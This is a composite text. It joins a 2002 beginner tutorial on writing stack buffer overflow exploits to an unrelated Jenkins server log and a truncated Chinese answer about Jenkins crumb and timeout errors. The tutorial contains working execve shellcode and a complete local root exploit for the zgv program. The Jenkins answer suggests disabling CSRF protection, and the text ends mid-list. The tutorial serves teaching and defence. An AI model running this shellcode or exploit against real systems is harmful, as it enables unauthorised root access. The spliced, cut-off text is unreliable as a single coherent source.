Writing Buffer Overflow Exploits - a Tutorial for Beginners 10 Apr. 2002

本文档详细介绍了如何发现并利用缓冲区溢出漏洞,包括内存布局、函数调用过程及如何构造恶意输入来改变程序执行流程等内容。
Writing Buffer Overflow Exploits - a Tutorial for Beginners10 Apr. 2002
 
 Summary
Buffer overflows in user input dependent buffers have become one of the biggest security hazards on the internet and to modern computing in general. This is because such an error can easily be made at programming level, and while invisible for the user who does not understand or cannot acquire the source code, many of those errors are easy to exploit. This paper attempts to teach the novice - average C programmer how an overflow condition can be proven to be exploitable.
 
Credit:
The information has been provided by Mixter.
 
 Details
1. Memory
Note: The way we describe it here, memory for a process is organized on most computers, however it depends on the type of processor architecture. This example is for x86 and roughly applies to Sparc.

The principle of exploiting a buffer overflow is to overwrite parts of memory that are not supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, let us look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. The processes memory consists of three sections:

 - Code segment, data in this segment are assembler instructions that the processor executes. The code execution is non-linear, it can skip code, jump, and call functions on certain conditions. Therefore, we have a pointer called EIP, or instruction pointer. The address where EIP points to always contains the code that will be executed next.

 - Data segment, space for variables and dynamic buffers

 - Stack segment, which is used to pass data (arguments) to functions and as a space for variables of functions. The bottom (start) of the stack usually resides at the very end of the virtual memory of a page, and grows down. The assembler command PUSHL will add to the top of the stack, and POPL will remove one item from the top of the stack and put it in a register. For accessing the stack memory directly, there is the stack pointer ESP that points at the top (lowest memory address) of the stack.


2. Functions
A function is a piece of code in the code segment that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function. In assembler, it usually looks like this (very simple example, just to get the idea):

memory address      code
0x8054321 <main+x>    pushl $0x0
0x8054322    call $0x80543a0 <function>
0x8054327    ret
0x8054328    leave
...
0x80543a0 <function>  popl %eax
0x80543a1    addl $0x1337,%eax
0x80543a4    ret

What happens here? The main function calls function(0); The variable is 0, main pushes it onto the stack, and calls the function. The function gets the variable from the stack using popl. After finishing, it returns to 0x8054327. Commonly, the main function would always push register EBP on the stack, which the function stores, and restores after finishing. This is the frame pointer concept that allows the function to use own offsets for addressing, which is mostly uninteresting while dealing with exploits, because the function will not return to the original execution thread anyways. We just have to know what the stack looks like. At the top, we have the internal buffers and variables of the function. After this, there is the saved EBP register (32 bit, which is 4 bytes), and then the return address, which is again 4 bytes. Going further down, there are the arguments passed to the function, which are uninteresting to us.

In this case, our return address is 0x8054327. It is automatically stored on the stack when the function is called. This return address can be overwritten, and changed to point to any point in memory, if there is an overflow somewhere in the code.

3. Example of an exploitable program
Let us assume that we exploit a function like this:

void lame (void) { char small[30]; gets (small); printf("%s/n", small); }
main() { lame (); return 0; }

Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
   binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 <main>:       pushl  %ebp
0x80484c9 <main+1>:     movl   %esp,%ebp
0x80484cb <main+3>:     call   0x80484a0 <lame>
0x80484d0 <main+8>:     leave
0x80484d1 <main+9>:     ret

(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0 <lame>:       pushl  %ebp
0x80484a1 <lame+1>:     movl   %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
   memory is allocated 4byte-wise (because the processor uses 32bit words)
   this is the equivalent to: char small[30]; */
0x80484a3 <lame+3>:     subl   $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
   at virtual address 0xffffffe0(%ebp)) on the stack, and call
   the gets function: gets(small); */
0x80484a6 <lame+6>:     leal   0xffffffe0(%ebp),%eax
0x80484a9 <lame+9>:     pushl  %eax
0x80484aa <lame+10>:    call   0x80483ec <gets>
0x80484af <lame+15>:    addl   $0x4,%esp
/* load the address of small and the address of "%s/n" string on stack
   and call the print function: printf("%s/n", small); */
0x80484b2 <lame+18>:    leal   0xffffffe0(%ebp),%eax
0x80484b5 <lame+21>:    pushl  %eax
0x80484b6 <lame+22>:    pushl  $0x804852c
0x80484bb <lame+27>:    call   0x80483dc <printf>
0x80484c0 <lame+32>:    addl   $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
   you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3 <lame+35>:    leave
0x80484c4 <lame+36>:    ret

End of assembler dump.

3a. Overflowing the program
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
     eax:       0x24          36
     ecx:  0x804852f   134513967
     edx:        0x1           1
     ebx:   0x11a3c8     1156040
     esp: 0xbffffdb8 -1073742408
     ebp:   0x787878     7895160
              ^^^^^^
EBP is 0x787878, this means that we have written more data on the stack than the input buffer could handle. 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes maximum size. We have written more data into memory than allocated for user input and therefore overwritten EBP and the return address with 'xxxx', and the process tried to resume execution at address 0x787878, which caused it to get a segmentation fault.

3b. Changing the return address
Lets try to exploit the program to return to lame() instead of return. We have to change the return address form 0x80484d0 to 0x80484cb. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET Here is a simple program to put the 4byte return address into a 1byte character buffer:
main()
{
int i=0; char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}
# ret
???????????,

# (ret;cat)|./blah
test     <- user input
???????????,test
test     <- user input
test

Here we are, the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the programs execution thread.


4. Shellcode
To keep it simple, shellcode is simply assembler commands, which we write on the stack and then change the return address to return to the stack. Using this method, we can insert code into a vulnerable process and then execute it right on the stack.
So, let us generate insertable assembler code to run a shell. A common system call is execve(), which loads and runs any binary, terminating execution of the current process. The manpage gives us the usage:
int execve (const char *filename, char *const argv [], char *const envp[]);
Let us get the details of the system call from glibc2:
# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00 <execve>:       pushl  %ebx

/* this is the actual syscall. before a program would call execve, it would
  push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01 <execve+1>:     movl   0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05 <execve+5>:     movl   0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09 <execve+9>:     movl   0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d <execve+13>:    movl   $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12 <execve+18>:    int    $0x80

0x5da14 <execve+20>:    popl   %ebx
0x5da15 <execve+21>:    cmpl   $0xfffff001,%eax
0x5da1a <execve+26>:    jae    0x5da1d <__syscall_error>
0x5da1c <execve+28>:    ret
End of assembler dump.

4a. Making the code portable
We have to apply a trick to be able to make shellcode without having to reference the arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time.
Once we can estimate the size of the shellcode, we can use the instructions jmp <bytes> and call to go a specified number of bytes back or forth in the execution thread. Why use a call? We have the opportunity that a CALL will automatically store the return address on the stack, the return address being the next 4 bytes after the CALL instruction. By placing a variable right behind the call, we indirectly push its address on the stack without having to know it.

0   jmp <Z>     (skip Z bytes forward)
2   popl %esi
... put function(s) here ...
Z   call <-Z+2> (skip 2 less than Z bytes backward, to POPL)
Z+5 .string     (first variable)

(Note: If you are going to write code more complex than for spawning a simple shell, you can put more than one .string behind the code. You know the size of those strings and can therefore calculate their relative locations once you know where the first string is located.)

4b. The shellcode
global code_start    /* we'll need this later, do not mind it */
global code_end
  .data
code_start:
  jmp  0x17
  popl %esi
  movl %esi,0x8(%esi)  /* put address of **argv behind shellcode,
           0x8 bytes behind it so a /bin/sh has place */
  xorl %eax,%eax    /* put 0 in %eax */
  movb %eax,0x7(%esi)  /* put terminating 0 after /bin/sh string */
  movl %eax,0xc(%esi)  /* another 0 to get the size of a long word */
my_execve:
  movb $0xb,%al    /* execve(         */
  movl %esi,%ebx    /* "/bin/sh",      */
  leal 0x8(%esi),%ecx  /* & of "/bin/sh", */
  xorl %edx,%edx    /* NULL       */
  int $0x80    /* );       */
  call -0x1c
  .string "/bin/shX"  /* X is overwritten by movb %eax,0x7(%esi) */
code_end:

(The relative offsets 0x17 and -0x1c can be gained by putting in 0x0, compiling, disassembling, and then looking at the shell codes size.)

This is already working shellcode, though minimal. You should at least disassemble the exit() syscall and attach it (before the 'call'). The real art of making shellcode also consists of avoiding any binary zeroes in the code (indicates end of input/buffer very often) and modify it for example, so the binary code does not contain control or lower characters, which would get filtered out by some vulnerable programs.
Most of this stuff is done by self-modifying code, as we had in the movb %eax,0x7(%esi) instruction. We replaced the X with /0, but without having a /0 in the shellcode initially...

Let us test this code... save the above code as code.S (remove comments) and the following file as code.c:
extern void code_start();
extern void code_end();
#include <stdio.h>
main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c
# ./code
bash#

You can now convert the shellcode to a hex char buffer.
Best way to do this is, print it out:
#include <stdio.h>
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

and parse it through aconv -h or bin2c.pl, those tools can be found at:
http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity.

5. Writing an exploit
Let us look at how to change the return address to point to shellcode put on the stack, and write a sample exploit. We will take zgv, because that is one of the easiest things to exploit out there.

# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0 0x61616161 in ?? ()
(gdb) info register esp
     esp: 0xbffff574 -1073744524

Well, this is the top of the stack at crash time. It is safe to presume that we can use this as return address to our shellcode. We will now add some NOP (no operation) instructions before our buffer, so we do not have to be 100% correct regarding the prediction of the exact start of our shellcode in memory (or even brute forcing it).
The function will return onto the stack somewhere before our shellcode, work its way through the NOPs to the initial JMP command, jump to the CALL, jump back to the popl, and run our code on the stack.

Remember, the stack looks like this: at the lowest memory address, the top of the stack where ESP points to, the initial variables are stored, namely the buffer in zgv that stores the HOME environment variable.

After that, we have the saved EBP(4bytes) and the return address of the previous function. We must write 8 bytes or more behind the buffer to overwrite the return address with our new address on the stack.

The buffer in zgv is 1024 bytes big. You can find that out by glancing at the code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable function. We will now put all those parts together in the exploit:

5a. Sample zgv exploit
/*                   zgv v3.0 exploit by Mixter
          buffer overflow tutorial - http://1337.tsx.org

        sample exploit, works for example with precompiled
    redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"/xeb/x17/x5e/x89/x76/x08/x31/xc0/x88/x46/x07/x89/x46/x0c/xb0/x0b/x89/xf3/x8d"
"/x4e/x08/x31/xd2/xcd/x80/xe8/xe4/xff/xff/xff/x2f/x62/x69/x6e/x2f/x73/x68/x58";

#define NOP     0x90
#define LEN     1032
#define RET     0xbffff574

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx/n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i<LEN;i+=4)
   *(long *)&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the
   buffer size, so the shellcode and return address fits in comfortably */
for (i=0;i<(LEN-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run zgv */

setenv("HOME", buffer, 1);
execlp("zgv","zgv",NULL);
return 0;
}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here
[ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));
At this point, zgv fails to do bounds checking, writes beyond the small buffer, and the return address to main is overwritten with the return address on the stack. function() does leave/ret and the EIP points onto the stack:
0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24                    1
0xbffff579 popl %esi          3 <--/    |
[... shellcode starts here ...]    |    |
0xbffff59b call -$0x1c             2 <--/
0xbffff59e .string "/bin/shX"

Lets test the exploit...
# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#

5b. Further tips on writing exploits
There are many programs that are tough to exploit, but nonetheless vulnerable. However, there are many tricks you can do to get behind filtering and such. Also other overflow techniques do not necessarily include changing the return address at all or only the return address. There are so-called pointer overflows, where a pointer that a function allocates can be overwritten by an overflow, altering the programs execution flow (an example is the RoTShB bind 4.9 exploit), and exploits where the return address points to the shells environment pointer, where the shellcode is located instead of being on the stack (this defeats very small buffers, and Non-executable stack patches, and can fool some security programs, though it can only be performed locally).
Another important subject for the skilled shellcode author is radically self-modifying code, which initially only consists of printable, non-white upper case characters, and then modifies itself to put functional shellcode on the stack which it executes, etc. You should never, ever have any binary zeroes in your shell code, because it will most possibly not work if it contains any. However, discussing how to sublimate certain assembler commands with others would go beyond the scope of this paper. We also suggest reading the other great overflow howto's out there, written by aleph1, Taeoh Oh and mudge.

6. Conclusions
We have learned, that once an overflow is present which is user dependent, it can be exploited about 90% of the time, even though exploiting some situations is difficult and takes some skill. Why is it important to write exploits? Because ignorance is omniscient in the software industry. There have already been reports of vulnerabilities due to buffer overflows in software, though the software has not been updated, or the majority of users did not update, because the vulnerability was hard to exploit and nobody believed it created a security risk. Then, an exploit actually comes out, proves, and practically enables a program to be exploitable, and there is usually a big (necessary) hurry to update it.

As for the programmer (you), it is a hard task to write secure programs, but it should be taken very serious. This is an especially large concern when writing servers, any type of security programs, or programs that are suid root, or designed to be run by root, any special accounts, or the system itself. Apply bounds checking (strn*, sn*, functions instead of sprintf etc.), prefer allocating buffers of a dynamic, input-dependent, size, be careful on for/while/etc. loops that gather data and stuff it into a buffer, and generally handle user input with very much care are the main principles we suggested.

There has also been made notable effort of the security industry to prevent overflow problems with techniques like non-executable stack, suid wrappers, guard programs that check return addresses, bounds checking compilers, and so on. You should make use of those techniques where possible, but do not fully rely on them. Do not assume to be safe at all, if you run a vanilla two-year old UNIX distribution without updates, but overflow protection or (even more stupid) firewalling/IDS. It cannot assure security, if you continue to use insecure programs because _all_ security programs are _software_ and can contain vulnerabilities themselves, or at least not be perfect. If you apply frequent updates _and_ security measures, you can still not expect to be secure, _but_ you can hope.
2025-09-12 03:59:46.390+0000 [id=63] INFO jenkins.InitReactorRunner$1#onAttained: System config adapted 2025-09-12 03:59:46.403+0000 [id=47] INFO jenkins.InitReactorRunner$1#onAttained: Loaded all jobs 2025-09-12 03:59:46.411+0000 [id=76] INFO jenkins.InitReactorRunner$1#onAttained: Configuration for all jobs updated 2025-09-12 03:59:46.427+0000 [id=53] INFO jenkins.InitReactorRunner$1#onAttained: Completed initialization 2025-09-12 03:59:46.473+0000 [id=36] INFO hudson.lifecycle.Lifecycle#onReady: Jenkins is fully up and running 2025-09-12 06:23:41.833+0000 [id=882] WARNING hudson.security.csrf.CrumbFilter#doFilter: Found invalid crumb 147b3c82bca9ebd1fa602daaf99e15931ab6f23e4863689a02a1634c924c7fef. If you are calling this URL with a script, please use the API Token instead. More information: https://www.jenkins.io/redirect/crumb-cannot-be-used-for-script 2025-09-12 06:23:41.834+0000 [id=882] WARNING hudson.security.csrf.CrumbFilter#doFilter: No valid crumb was included in request for /view/%E5%87%AF%E5%88%A9/job/%E6%8C%87%E6%8C%A5%E5%A4%A7%E5%B1%8Fapi-pipeline/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile by admin. Returning 403. 2025-09-12 09:21:05.113+0000 [id=2548] WARNING j.p.p.BapSshClient#waitForExec: null java.lang.InterruptedException at java.base/java.lang.Object.wait(Native Method) at java.base/java.lang.Thread.join(Unknown Source) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.waitForExec(BapSshClient.java:567) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.exec(BapSshClient.java:481) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:242) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:51) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.endTransfers(BapPublisher.java:283) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.perform(BapPublisher.java:233) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.access$000(BapPublisher.java:205) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher.perform(BapPublisher.java:158) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:65) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:38) at hudson.FilePath.act(FilePath.java:1210) at hudson.FilePath.act(FilePath.java:1193) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPInstanceConfig.perform(BPInstanceConfig.java:141) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPPlugin.perform(BPPlugin.java:126) at jenkins.tasks.SimpleBuildStep.perform(SimpleBuildStep.java:123) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:101) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:71) at PluginClassLoader for workflow-step-api//org.jenkinsci.plugins.workflow.steps.SynchronousNonBlockingStepExecution.lambda$start$0(SynchronousNonBlockingStepExecution.java:49) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source) at java.base/java.util.concurrent.FutureTask.run(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.base/java.lang.Thread.run(Unknown Source) 2025-09-12 09:21:05.113+0000 [id=2640] WARNING j.p.p.BapSshClient$ExecCheckThread#run: sleep interrupted java.lang.InterruptedException: sleep interrupted at java.base/java.lang.Thread.sleep(Native Method) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient$ExecCheckThread.run(BapSshClient.java:592) 2025-09-12 09:21:05.114+0000 [id=2548] WARNING j.p.p.BPCallablePublisher#invoke: Exception when publishing, exception message [Exec timed out or was interrupted after 64,625 ms] jenkins.plugins.publish_over.BapPublisherException: Exec timed out or was interrupted after 64,625 ms at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.waitForExec(BapSshClient.java:577) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.exec(BapSshClient.java:481) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:242) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:51) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.endTransfers(BapPublisher.java:283) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.perform(BapPublisher.java:233) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.access$000(BapPublisher.java:205) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher.perform(BapPublisher.java:158) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:65) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:38) at hudson.FilePath.act(FilePath.java:1210) at hudson.FilePath.act(FilePath.java:1193) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPInstanceConfig.perform(BPInstanceConfig.java:141) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPPlugin.perform(BPPlugin.java:126) at jenkins.tasks.SimpleBuildStep.perform(SimpleBuildStep.java:123) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:101) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:71) at PluginClassLoader for workflow-step-api//org.jenkinsci.plugins.workflow.steps.SynchronousNonBlockingStepExecution.lambda$start$0(SynchronousNonBlockingStepExecution.java:49) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source) at java.base/java.util.concurrent.FutureTask.run(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.base/java.lang.Thread.run(Unknown Source) 2025-09-12 09:21:05.115+0000 [id=2548] WARNING j.p.p.BPInstanceConfig#perform: An exception was caught when invoking perform jenkins.plugins.publish_over.BapPublisherException: Exec timed out or was interrupted after 64,625 ms at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.waitForExec(BapSshClient.java:577) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.exec(BapSshClient.java:481) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:242) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:51) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.endTransfers(BapPublisher.java:283) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.perform(BapPublisher.java:233) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.access$000(BapPublisher.java:205) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher.perform(BapPublisher.java:158) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:65) Caused: jenkins.plugins.publish_over.BapPublisherException: Exception when publishing, exception message [Exec timed out or was interrupted after 64,625 ms] at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:69) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:38) at hudson.FilePath.act(FilePath.java:1210) at hudson.FilePath.act(FilePath.java:1193) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPInstanceConfig.perform(BPInstanceConfig.java:141) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPPlugin.perform(BPPlugin.java:126) at jenkins.tasks.SimpleBuildStep.perform(SimpleBuildStep.java:123) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:101) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:71) at PluginClassLoader for workflow-step-api//org.jenkinsci.plugins.workflow.steps.SynchronousNonBlockingStepExecution.lambda$start$0(SynchronousNonBlockingStepExecution.java:49) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source) at java.base/java.util.concurrent.FutureTask.run(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.base/java.lang.Thread.run(Unknown Source) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007604e4b3ec9f, pid=7, tid=170 # # JRE version: OpenJDK Runtime Environment Temurin-17.0.16+8 (17.0.16+8) (build 17.0.16+8) # Java VM: OpenJDK 64-Bit Server VM Temurin-17.0.16+8 (17.0.16+8, mixed mode, tiered, compressed oops, compressed class ptrs, g1 gc, linux-amd64) # Problematic frame: # V [libjvm.so+0x83dc9f] java_lang_Throwable::fill_in_stack_trace(Handle, methodHandle const&, JavaThread*)+0x95f # # Core dump will be written. Default location: Core dumps may be processed with "/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E" (or dumping to //core.7) # # An error report file with more information is saved as: # /tmp/hs_err_pid7.log # # If you would like to submit a bug report, please visit: # https://github.com/adoptium/adoptium-support/issues # Running from: /usr/share/jenkins/jenkins.war webroot: /var/jenkins_home/war 2025-09-12 09:22:52.973+0000 [id=1] INFO winstone.Logger#logInternal: Beginning extraction from war file 2025-09-12 09:22:53.005+0000 [id=1] WARNING o.e.j.ee9.nested.ContextHandler#setContextPath: Empty contextPath 2025-09-12 09:22:53.025+0000 [id=1] INFO org.eclipse.jetty.server.Server#doStart: jetty-12.0.22; built: 2025-06-02T15:25:31.946Z; git: 335c9ab44a5591f0ea941bf350e139b8c4f5537c; jvm 17.0.16+8 2025-09-12 09:22:53.151+0000 [id=1] INFO o.e.j.e.w.StandardDescriptorProcessor#visitServlet: NO JSP Support for /, did not find org.eclipse.jetty.ee9.jsp.JettyJspServlet 2025-09-12 09:22:53.168+0000 [id=1] INFO o.e.j.s.DefaultSessionIdManager#doStart: Session workerName=node0 2025-09-12 09:22:53.313+0000 [id=1] INFO hudson.WebAppMain#contextInitialized: Jenkins home directory: /var/jenkins_home found at: EnvVars.masterEnvVars.get("JENKINS_HOME") 2025-09-12 09:22:53.347+0000 [id=1] INFO o.e.j.s.handler.ContextHandler#doStart: Started oeje9n.ContextHandler$CoreContextHandler@1813f3e9{Jenkins v2.516.2,/,b=file:///var/jenkins_home/war/,a=AVAILABLE,h=oeje9n.ContextHandler$CoreContextHandler$CoreToNestedHandler@28cb9120{STARTED}} 2025-09-12 09:22:53.353+0000 [id=1] INFO o.e.j.server.AbstractConnector#doStart: Started ServerConnector@72458efc{HTTP/1.1, (http/1.1)}{0.0.0.0:8080} 2025-09-12 09:22:53.357+0000 [id=1] INFO org.eclipse.jetty.server.Server#doStart: Started oejs.Server@b9b00e0{STARTING}[12.0.22,sto=0] @603ms 2025-09-12 09:22:53.357+0000 [id=43] INFO winstone.Logger#logInternal: Winstone Servlet Engine running: controlPort=disabled 2025-09-12 09:22:53.400+0000 [id=36] INFO jenkins.model.Jenkins#<init>: Starting version 2.516.2 2025-09-12 09:22:53.430+0000 [id=50] INFO jenkins.InitReactorRunner$1#onAttained: Started initialization 2025-09-12 09:22:53.490+0000 [id=79] INFO jenkins.InitReactorRunner$1#onAttained: Listed all plugins 2025-09-12 09:22:54.524+0000 [id=108] INFO jenkins.InitReactorRunner$1#onAttained: Prepared all plugins 2025-09-12 09:22:54.531+0000 [id=65] INFO jenkins.InitReactorRunner$1#onAttained: Started all plugins 2025-09-12 09:22:54.532+0000 [id=65] INFO jenkins.InitReactorRunner$1#onAttained: Augmented all extensions 2025-09-12 09:22:54.725+0000 [id=27] INFO h.p.b.g.GlobalTimeOutConfiguration#load: global timeout not set 2025-09-12 09:22:55.091+0000 [id=94] INFO jenkins.InitReactorRunner$1#onAttained: System config loaded 2025-09-12 09:22:55.092+0000 [id=50] INFO jenkins.InitReactorRunner$1#onAttained: System config adapted 2025-09-12 09:22:55.114+0000 [id=95] INFO jenkins.InitReactorRunner$1#onAttained: Loaded all jobs 2025-09-12 09:22:55.115+0000 [id=69] INFO jenkins.InitReactorRunner$1#onAttained: Configuration for all jobs updated 2025-09-12 09:22:55.139+0000 [id=83] INFO jenkins.InitReactorRunner$1#onAttained: Completed initialization 2025-09-12 09:22:55.204+0000 [id=36] INFO hudson.lifecycle.Lifecycle#onReady: Jenkins is fully up and running
09-13
<think> 我们针对用户提出的四个问题:无效crumb警告、InterruptedException异常、执行超时异常、Java SIGSEGV致命错误,分别提供解决方案。同时,结合之前提供的引用内容,我们将给出具体步骤。 ### 一、解决无效crumb警告(CSRF相关问题) **问题描述**:在Jenkins API请求中出现`403 No valid crumb`错误,通常是因为CSRF保护机制导致。 **解决方案**: 1. **临时禁用CSRF保护(不推荐)**: 进入`Manage Jenkins` → `Configure Global Security`,取消勾选`Enable proxy compatibility`和`Prevent Cross Site Request Forgery exploits`。但此操作会降低安全性。 2. **正确获取crumb(推荐)**: 确保在API请求中包含有效的crumb。获取crumb的方式如下: ```bash CRUMB=$(curl -u 'username:api_token' -s 'http://jenkins-url/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)') curl -u 'username:api_token' -H "$CRUMB" -X POST http://jenkins-url/job/your-job/build ``` 注意:如果Jenkins版本较高(如2.479.2),确保使用正确的crumb获取接口[^3]。 3. **使用API Token替代密码**: 在`用户设置`中生成API Token,并在请求中使用`username:api_token`进行认证。 ### 二、InterruptedException异常 **问题描述**:在Jenkins任务中抛出`java.lang.InterruptedException`,通常表示任务被中断[^1]。 **可能原因**: - 用户手动中止任务 - 系统资源不足(CPU/内存) - 任务超时 - Jenkins节点断开 **解决方案**: 1. **检查任务日志**:查看是否有明确的超时或资源不足提示。 2. **增加超时设置**: 在Pipeline中增加超时时间: ```groovy timeout(time: 60, unit: 'MINUTES') { // 任务步骤 } ``` 3. 